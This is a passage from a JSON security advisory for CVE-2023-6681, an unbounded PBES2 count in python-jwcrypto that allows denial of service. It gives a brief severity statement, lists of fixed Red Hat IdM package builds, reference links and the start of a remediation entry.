"text": "The identified vulnerability within the jwcrypto package, presents a moderate severity concern rather than a important one due to several mitigating factors. While the unbounded PBES2 Count value in PBKDF2 algorithms can potentially facilitate a Denial of Service (DoS) attack, its severity is tempered by the fact that successful exploitation requires specific conditions and considerable computational resources. Additionally, applications not reliant on PBKDF2 can easily exclude it from their algorithms list, further reducing exposure.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-epn-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-samba-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-common-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debuginfo-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-debugsource-4.9.13-9.module+el8.10.0+21692+c9b201bc.x86_64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19634+c162f948.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-0.12-3.module+el8.9.0+19692+fac39a03.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19634+c162f948.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-healthcheck-core-0.12-3.module+el8.9.0+19692+fac39a03.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-python-compat-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-selinux-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-common-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-dns-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-server-trust-ad-debuginfo-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debuginfo-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:opendnssec-debugsource-2.1.7-1.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaclient-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipalib-4.9.13-9.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipaserver-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-ipatests-4.9.13-9.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21691+df63127d.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-jwcrypto-0.5.0-2.module+el8.10.0+21692+c9b201bc.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-kdcproxy-0.4-5.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-qrcode-core-5.1-12.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:python3-yubico-1.3.2-9.1.module+el8.9.0+18920+2223d05e.noarch.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:pyusb-1.0.0-9.1.module+el8.9.0+18920+2223d05e.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debuginfo-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:slapi-nis-debugsource-0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debuginfo-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-debugsource-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:softhsm-devel-2.6.0-5.module+el8.9.0+18911+94941f82.x86_64.rpm-idm:DL1"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-6681"
},
{
"category": "external",
"summary": "RHBZ#2260843",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2260843"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6681"
}
],
"release_date": "2023-12-28T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-22T11:47:22+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debuginfo-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:bind-dyndb-ldap-debugsource-11.6-5.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.noarch.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:custodia-0.6.0-3.module+el8.9.0+18911+94941f82.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21691+df63127d.src.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-4.9.13-9.module+el8.10.0+21692+c9b201bc.src.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.aarch64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.s390x.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21691+df63127d.x86_64.rpm-idm:DL1",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.aarch64.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.ppc64le.rpm-idm:client",
"AppStream-8.10.0.Z.MAIN.EUS:ipa-client-4.9.13-9.module+el8.10.0+21692+c9b201bc.s390x.rpm-idm:client",
